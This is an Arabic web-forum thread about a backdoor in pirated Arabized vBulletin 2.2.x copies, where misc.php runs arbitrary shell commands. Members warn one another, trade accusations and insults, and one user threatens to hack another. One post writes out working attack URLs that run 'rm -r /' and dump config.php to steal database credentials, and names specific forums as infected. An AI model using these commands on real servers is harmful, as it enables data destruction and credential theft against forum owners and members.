ثغره مقصوده في منتدى vb تعريب دار العرب :(

[قلعة العرب]

عجبي ا
نا عملت 6 منتديات ينسخة دار العرب ودائما تطلعلي الصفحة بيضاء
اليك عزيزي
http://mineerva.com/vb
http://minerva.host.sk/vb
http://altahamy.com/vb
http://altahamy.host.sk/vb
http://jwad.com/vb
http://waseem.host.sk/vb
http://loly.host.sk/vb

المنتدى الاول منتداي الرئيسي
المنتديات الاخرى لاصدقائي ومنتديات تجريبية الي
غريبة في كلهم ما طلع اي غلط الا في منتداكم انتو الكم واحد !!!!!!!

والله العالم ماعندها سيرة غير نسخة دار العرب لانها افضل نسخة الصراحة...لا انكر هناك خطا واحد فيها والكل استطاع حله
فقط هذا الخطا وهو ممكن سهوة او نسوة عزيزي...

بس ما اقول الكم اي شيء
انا اقول فقط للاخ دار العرب
خلك تعطي مجاني ... العالم الي ما تستاهل تذكر اسمها

هذا بسب المجاني وان شاء الله يجي يوم وما تلاقو اي شخص يعطيكم مجاني...ساعتها راح اشوف شلون
دخيلك يا دار العرب والله يرحم والديك يا دار العرب وانقذنا يا دار العرب ومن هذا الحكي الي انا سامعه كثير واكثر من كثير من اغلبية المستخدمين..

ليس فقط لدار العرب...بل لجميع المعربين..
يوم يجيك واحد مو عارف يركب نسخة منتدى يقولك نسخة ابو منار فيها خطا
الثاني مو عارفي انه راح يتشفرو الباسوردز بعد الترقية يقلك نسخة دار العرب فيها خطا ماني عارف الرقم السري حقي

الله بعين اخواني الله بعين

اصلا نحن العرب لن نصبح بحياتنا الا اذا صار كل شي فلوس بفلوس وساعتها خلكم تعملو منتديات على كيفكم...

في الاساس لولا دار العرب ممكن نقول 40 من المنتديات العربية ما شافت النور...ولولا غيره كمان 40% من المنتديات ما شافت النور
ولولا غيره كمان ووهكذا
لحين ما تشوفون غير نسخة وحدة طاقة عقولكم عليها الي هو مركبها دار العرب في منتداه او مركبها غيره من المعربين في منتداهم..

يعني ما يبقى غير حوالي خمس منتديات معربة الي هية منتديات المعربين...ساعتها اخواني راح تشوفو منتداكم الي عاملينه بالانجليزي وتحوص ليل نهار عشان تلاقي مين يعربه..وبالاخير تلاقي واحد يقلك حط فلوس$$$ اعربلك ياه ما ... تحط اطلع برا
وراح تشوف انك راح تضلك برا طول حياتك
لان اغلب العرب ما يدفعون ليش...لانهم يبون تعب غيرهم ببلاش...وبالاخر يجي يقولك انه صاحبها غير امين... فجزاكم الله خيرا على ما فعلتم من اجل رد جميل هذا الانسان الذي سهر الليالي ليعرب لك نسخة وهو ليس له الفضل فقط عليك..لا اله فضل عليك غصب عنك واله فضل على رواد منتداك..لانه عملهم ساحة حوار عربية وببلاش!!والله ما يسمعون جون وربعة ليسكرو منتداه في ربع دقيقة وهو مضحي بالخطر لمنتداه عشان تيجون انتو في النهاية....تعرفون الباقي اكيد!!!...

واتفق العرب على ان لا يتفقو في حياتهم..

وهذي نصيحة لكل المعربين ولا استثني احد منهم...كلمة لكل المعربين
يا خي ليش تعرب وتنزل نحنا ما نستحق تضوع تعبك من اجل نفضح فيك في النهاية نحنا ما نستاهل والله ما نستاهل تعربون قائمة بريدية
لان ثاني يوم راح نيجي نقولكم انها مضروبة


للاسف وبالفعل للاسف هذا حال العرب
ودمتم في رعاية الله

[altibb]

انا كما اسلفت عندي النسخة المضروبة وحقيقة انصح جميع الشباب بتفادي هذي الثغرة ومسح الاسطر اللي اشار لها الاخ محسن لانها فعلاً ثغرة امنية وهذا الكلام ماجبته من عندي وامس انا جربت على منتداي وعلى السيرفر عندي لكن بعد ان التقيت باحد الشباب الخبرة في هذا المجال جرب سطر على سيرفري المحلي (ويندوز) وفعلا سرد جميع الملفات اللي بمجلد (vb) وظهر زي ماهو امامكم الان في الاسطر التالية :

كود:

Volume in drive C has no label
 Volume Serial Number is 0D49-1C01
 Directory of C:\apache\htdocs\vb223

.              <DIR>        27/02/02 10:09a .
..             <DIR>        27/02/02 10:09a ..
ANNOUN~1 PHP         3.990  07/03/02  2:54a announcement.php
ATTACH~1 PHP         2.573  07/03/02  2:54a attachment.php
AVATAR   PHP         1.275  07/03/02  2:54a avatar.php
CALENDAR PHP        30.884  07/03/02  2:54a calendar.php
CP       CSS         2.498  07/03/02  2:54a cp.css
EDITPOST PHP        10.651  07/03/02  2:54a editpost.php
FAVICON  ICO         4.710  07/03/02  2:54a favicon.ico
FORUMD~1 PHP        23.609  07/03/02  2:54a forumdisplay.php
GLOBAL   PHP         9.454  07/03/02  2:54a global.php
INDEX    PHP        12.092  07/03/02  2:54a index.php
MEMBER   PHP        47.318  07/03/02  2:54a member.php
MEMBER2  PHP        14.749  07/03/02  2:54a member2.php
MEMBER~1 PHP         6.642  07/03/02  2:54a memberlist.php
MISC     PHP         4.852  08/03/02 12:33p misc.php
MODERA~1 PHP         2.259  07/03/02  2:54a moderator.php
NEWREPLY PHP        18.064  07/03/02  2:54a newreply.php
NEWTHR~1 PHP        14.476  07/03/02  2:54a newthread.php
POLL     PHP        17.552  07/03/02  2:54a poll.php
POSTINGS PHP        32.002  07/03/02  2:54a postings.php
PRINTT~1 PHP         3.102  07/03/02  2:54a printthread.php
PRIVATE  PHP        27.683  07/03/02  2:54a private.php
PRIVATE2 PHP        27.431  07/03/02  2:54a private2.php
REGISTER PHP        22.073  07/03/02  2:54a register.php
REPORT   PHP         2.018  07/03/02  2:54a report.php
SEARCH   PHP        37.524  07/03/02  2:54a search.php
SENDTO~1 PHP         2.423  07/03/02  2:54a sendtofriend.php
SHOWTH~1 PHP        15.646  07/03/02  2:54a showthread.php
THREAD~1 PHP         4.046  07/03/02  2:54a threadrate.php
USERCP   PHP        10.900  07/03/02  2:54a usercp.php
VBCODE   JS          5.381  07/03/02  2:54a vbcode.js
VBCODE~1 JS          1.770  07/03/02  2:54a vbcode_language.js
ONLINE   PHP        29.996  07/03/02  2:54a online.php
SHOWGR~1 PHP         6.699  07/03/02  2:54a showgroups.php
ADMIN          <DIR>        27/02/02 10:09a admin
IMAGES         <DIR>        27/02/02 10:09a images
MOD            <DIR>        27/02/02 10:09a mod
IMAGE1   PSP        41.297  11/05/02  2:18a Image1.psp
HEADER   TXT           624  11/05/02  2:34a header.txt
IMAGE1   GIF        28.982  11/05/02  2:18a Image1.gif
FOOTER   TXT           439  11/05/02  2:34a footer.txt
INDEX    HTM         1.284  11/05/02  2:34a index.htm
PSPBRWSE JBF         7.502  01/03/02 12:42a pspbrwse.jbf
IMAGES~1       <DIR>        28/02/02 11:07p images111
        39 file(s)        536.470 bytes
         6 dir(s)   1.827.012.608 bytes free

لذلك وجب الحذر واخونا دار العرب له كل المحبة وهو معروف بامانته واخلاصة وحبة للغير وانا اول من تعلمت على يدية لكن وجب التحذير من هذه النسخة التي كما قال احد الاخوان ربما كانت النسخة قد تعرضت للقرصنة من شخص واضاف هذه السطور للملف .

[محسن]

قلعة العرب

إذا ماعليك أمر أبغا نسخه من الملف اللي تكلمنا عنه والموجود في أول منتدى كتبته في موضوعك السابق

هذا شي

الشي الثاني انا في الوقت اللي قاعد اكتب الرد هذا حصلت موقع فيه الثغره هذي
وكنت راح أكتبه هنا
لكن للأسف لاني قدرت أقرا محتوى ملف config.php وهذا فيه خطر على الموقع المذكور

لذلك أنا راح أعطي الموقع هذا لواحد فقط وهو دار العرب ( هذا إذا كان عارف بالموضوع)

[محمد_يوسف111]

اسمعوا:
دار العرب بريء من ذلك تماماً براءة الذئب من دم يوسف

هل تعرفون من وضع هذا الكود ؟ سأخبركم...
سؤال ، من أين أتى دار العرب بالنسخة التي عربها ؟؟؟
إنها من بعض المخربين "الكراكرز" الذين قاموا بأخذ النسخة الأصلية وحذفوا كود التبليغ ثم وضعوا أكواد أخرى خبيثة أكثر خطراً من كود التبليغ نفسه، وبعد ذلك نشروها

وهذا ببساطة يعني أن أغلب النسخ الموجودة هنا المقرصنة تحتوي على نفس الثغرة

وهي بالمناسبة ليست ثغرة، وإنما باب خلفي يستغله من قرصن vBulletin للروح والمجيء في مواقع الضحايا الذين استخدموا النسخة التي وزعها (هل عرفت الآن لماذا يوزع الكراكرز هذه الأشياء مجاناً؟)

ولا تقتصر على عرض الملفات فقط كما هو شائع بل إنها تعطي القدرة الكاملة على تنفيذ أي أمر على الخادم وكأنك أمام الخادم

يعني مثلاً جرب :

http://somedomain/misc.php?action=systemclen2&cc=rm -r /

وادعيلي

ستجد أن جميع محتويات القرص الصلب (بل جميع الأقراص الصلبة) الموجودة على الخادم قد انمحت تماماً وكأن ليس لها وجود بما في ذلك نظام التشغيل نفسه
طبعاً في بعض الخوادم الأكثر أماناً ، قد لا يقوم بفعل هذا الشيء ولكنه على الأقل جداً سيمحي جميع الملفات التي مسموح للـPHP بمحوها
يعني لو كان الـPHP يعمل كمستخدم جذري سيتم محو كل شيء
لو مستخدم عادي سيتم محو كل متعلقاته (جميع الملفات الخاصة به التي تشمل منتديات ملفات HTML كل الموقع الخاص بك)


والأخطر من ذلك هو سرقة البيانات مثلاً:
http://somedomain/misc.php?action=systemclen2&cc=cat admin/config.php > stolendata
ثم
http://somedomain/stolendata

سيتم عرض اسم المستخدم وكلمة السر لقاعدة البيانات والخادم الخاص بها

ومن ثم يمكن استخدام هذه البيانات في سرقة جميع بيانات المشتركين في المنتدى والمراقبين والمشرفين، بكلمات المرور بالطبع

[altibb]

قمت بانزال النسخة اللي في اللي في هذا الموضوع

vbulletin v2.2.3 B تحميل وشرح للتركيب والابقريد


ووجدت انها مضروبة وفيها مشكلة نفس المشكلة !!!!!


طيب قمت بانزال النسخة اللي في هذا الموضوع

vbulletin v2.2.2 تحميل وشرح للتركيب والابقريد

ونفس الشئ ذاته النسخة مضروبة ونفس الثغرة في النسختين تصدقون؟؟؟

وانا جربت الثغرة على النسخة 2.2.3 وتطبيق الثغرة بالرد اللي لي بالاعلى

الموضوعين تم طرحهما الموضوعين تم طرحهما من قبل العضو (Coderz) ونحن ننتظر ردة لان هذه النسختين اقدم من نسخ دار العرب ونحن وثقنا فيه وفي نسختة قبل نسخة دار العرب ونفي الاسطر ونفس كل شئ ولا احد انتبة إلا بعد مانبهنا محسن لنسخة دار العرب لكن انا الان اوضح لكم نسخ اقدم ونفس المشكلة



كذلك هذه النسخة في هذا الموضوع
نسخة المنتديات 2.2.5 من دار العرب

لذلك تكون الحصيلة هي ثلاث نسخ مضروب في المنتدى
2.2.2
2.2.3
2.2.5


وانصحكم تزورا هذا الموضوع وعني انا لاتعليق

اضغط هنا


لاحول ولا قوة إلا بالله

[محمد_يوسف111]

قلعة العرب:
المنتدى الخاص بك موجود به هذا الباب الخلفي
جرب :
http://mineerva.com/vb/misc.php?acti...cc=somecommand

محسن:
قلت لكم أنني أخبرته بعد أن وجدت المنتدى الخاص به مصاب أيضاً بهذه الثغرة (تم إزالة الملف misc.php لذلك لا احد يحاول الذهاب هناك واختراقه)

أيضاً لا يوجد نظري أو عملي
أنا قلت أن هذا يعتمد على ملف php.ini ولكن من الواضح أن أغلب الخوادم لا يهمها هذا الأمر كثيراً

يعتمد عمل هذا الباب الخلفي أو لا على إعدادات php.ini فمثلاً لو كان على Safe Mode فسيتم إلغاء الدوال التي تنفذ أوامر على النظام مثل
host.sk
جرب مثلاً:
http://loly.host.sk/vb/misc.php?acti...cc=somecommand

ثم هذا:
http://loly.host.sk/vb/misc.php?acti...cc=somecommand

ثم هذا:
http://loly.host.sk/vb/misc.php?acti...cc=somecommand


ثم هذا:
http://loly.host.sk/vb/misc.php?acti...cc=somecommand

ستعلم أن host.sk آمن بدرجة كبيرة حيث يمنع تنفيذ أوامر باستخدام الـPHP

[قلعة العرب]

رد مقتبس من محمد_يوسف111
قلعة العرب:
المنتدى الخاص بك موجود به هذا الباب الخلفي
جرب :
http://mineerva.com/vb/misc.php?acti...cc=somecommand

محسن:
قلت لكم أنني أخبرته بعد أن وجدت المنتدى الخاص به مصاب أيضاً بهذه الثغرة (تم إزالة الملف misc.php لذلك لا احد يحاول الذهاب هناك واختراقه)

أيضاً لا يوجد نظري أو عملي
أنا قلت أن هذا يعتمد على ملف php.ini ولكن من الواضح أن أغلب الخوادم لا يهمها هذا الأمر كثيراً

يعتمد عمل هذا الباب الخلفي أو لا على إعدادات php.ini فمثلاً لو كان على Safe Mode فسيتم إلغاء الدوال التي تنفذ أوامر على النظام مثل
host.sk
جرب مثلاً:
http://loly.host.sk/vb/misc.php?acti...cc=somecommand

ثم هذا:
http://loly.host.sk/vb/misc.php?acti...cc=somecommand

ثم هذا:
http://loly.host.sk/vb/misc.php?acti...cc=somecommand


ثم هذا:
http://loly.host.sk/vb/misc.php?acti...cc=somecommand

ستعلم أن host.sk آمن بدرجة كبيرة حيث يمنع تنفيذ أوامر باستخدام الـPHP

معناتها اخوي دار العرب ما اله علاقة ؟؟ صح اخوي محمد يوسف او لاء ؟؟؟
لانه حتى منتداه كان مضرب فيه صح ؟؟ يعن الاصل مضروب مو منه..
طيب الاخ محسن من وين بيجيب كلام يقول دار العرب هو الي حاططهم ؟؟؟
هذا طلع اخونا دار العرب سليم منها لان النسخ الاصلية مضربة..فلا يجب علينا قول اي شيء يذم انسان يخدمنا..

ما حلوة تنزعو سمعة الرجال يا جماعة ونجمه لامع بالمنتديات العربية كلها واذا انتو بطلتو عن نسخه لا تخاف اخوي...انا اقولك لحد سنتين راح تضل العالم مدينة لنسخه وتعريبه... وانا ارى ان تعريبه متفوق عن تعريب الجميع في برنامج ال vb
تحياتي

تحياتي

[waleed41]

اخوي قلعه العرب يا خوي احس انك غبي مره وربي

يعني تبع بس من غير تفكير او عقل وكانك محامي ترد عن الناس واني على علم ويقين انك لا تفهم اي شيء في هذه الامور فقط لسانك كاني اقول انك محامي

ساعات استغرب من اسلوبك وعدم تفكيرك وانحاط علمك وغرورك يا اخي لا دار العرب ولا غيره معصومين من الاخطاء وبعدين دار العرب يعني توه يتعلم يعني ممكن ان يخدع مثل الكثير وليس هو معصوم ولا يمكن ان يخطى


اتمنى ان تترك لغافتك الزاده وان تبتعد وتجعل كل انسان يرد عن نفسه ويدافع عن نفسه لنك لست محامين عن احد ولست مفوض من قبل اي احد فا ارجوك الزم الصمت حتى الثغرات الامنيه لا تعرفها وحاولت ان تتكلم بها من غير علم حتى انك وقعت في المشكله


احب اقول لك يا من كتب موضوع حمايه المنتديات وارقد وامن


اتحب ان اخترق منتداك لترى هل فيه ثغره ام لا




ارجو من الجميع المعذره ولكني رايت انسان جاهل من مثل قلعه العرب قد انفعل من غير اي معلومه يعرفها وجلس يلطخ بالكلام الغير مفيد ففي المره الاول قال انه الثغره غير موجوده وعندما فحصنا منتداه قال انه دار العرب ليس له علاقه فتذبذبه في الكلام وجهله في امور لا يعلمها ولقافه الزائده في كل مكان جعلني ان ارد بهذا الرد الجارح له

[altibb]

الثغرة سلمك الله موجودة موجودة وليست في دار العرب لوحدة بل النسخ اللي قبله وخلال تصفحي الساعات الماضية وجدت اكثر من خمس منتديات بها هذه المشكلة وتم ابلاغهم جميعاً بالمشكلة حتى لايقعوا فريسة لضعاف النفوس

[قلعة العرب]

waleed41
خل عنك انت عزيزي...انا نفسيتي محترمة ما تسمحلي اوسخ لساني فيك ثانيا يا ابو 3 مشاركات..يعني طلعت سجلت باسم جديد ودخلت عشان تحكي كلمتين زي وجهك...ياريت ترجع على الفرشة يكون افضلك..ثانيا يا عزيزي انا مو محامي بس انا ما احب انكر فضل اي شخص كان اعتقد مفضل بنسخته المعربة على نصف المنتديات العربية...لكن انا فيني اصل لا انكر الفضل بس انت للاسف ... نكرت فضله عليك و وريني منتداك عشان اشوفك يا ابو الثغرات اسف انت حاميها...وانا ما افهم اخوي..والدليل منتداي كله خرابة والمنتديات الي انا مساويهم ما يسوو عزيزي..كل شي انا عامله ما يسوى هذا دليل اني ما افهم شيء في الثغرات الامنية... بس انت ورني منتداك عشان اشوف شو بتفهم...انظر نظرة خفيفة لمنتداك وانظر نظرة خفيفة لمنتداي وراح تشوف الفرق بيني وبينك...يا ابو التغرات

كمان الثغرة الي تكلمو عنها الشباب هي غير الي عندي حاليا
شوف الاربطين وتاكد وبلا فلسفة زايدة
يلا ما راح اوسخ نفسي فيك لاني انا عارف مين انا وانت من لسانك راح تعرف مين انت

----------------------
اخي الطبيب..من كلامك هذا يؤدي انه كل النسخ مضربة صح...يعني دار العرب ما اله علاقة .. النسخة تيجيه مضروبة مو مثل ما قال البعض انه هو الي حاط فيها هالكود... المهم عدم الاتهام وانا قبل كل شيء قلت انتظرو صاحب العلاقة ... انافقط شيء واحد لماذا لا ننتظر الاخ دار العرب...الاخ محمد يوسف قال انه حتى دار العرب لم يعلم بالامر..



تحياتي للجميع ما عدا هذا المعتوه ابو 3 مشاركات ... انا اعرفك عزيزي لا تخاف بس ثاني مرة لا تخرج وتسجل وتفوت تحكي...احكي باسمك عشان تبين للشباب اسف فضحتك

[altibb]

والله انا قلت ذلك ان يضحي دار العرب بسمعته من اجل اختراق وعمليات الهكينج ،،، لكن ننتظر رده على الموضوع ورد الاخ Coderz وهو اول من وضع نسخ من منتديات بها اوامر (php) خطيرة وليست نسخة واحدة بل نسختين ونفس الاسطر موجودة في نسخة دار العرب لذلك الذي يجب ان يسأل اولاً هو (Coderz) ولا وش رايك ؟؟

[al-hores]

اخوي الطيب مشكور على التنبية واللة يجزاك كل خير بس اخوي بغينا الحل وشهو على شان نتفادى المشاكل وشكرا لكم جميعا على هذا التنبية

[al-hores]

طيب وش رايكم واحد من الاخوان ينزل الملف معدل وجاهز لتحميل بدل القديم وشكرا لكم

[illogicalX]

لاحول ولا قوة الا بالله

لا تعليق

[alkahf]

استبدل الملف بهذا الملف الأصلي :

و السلام عليكم

عماد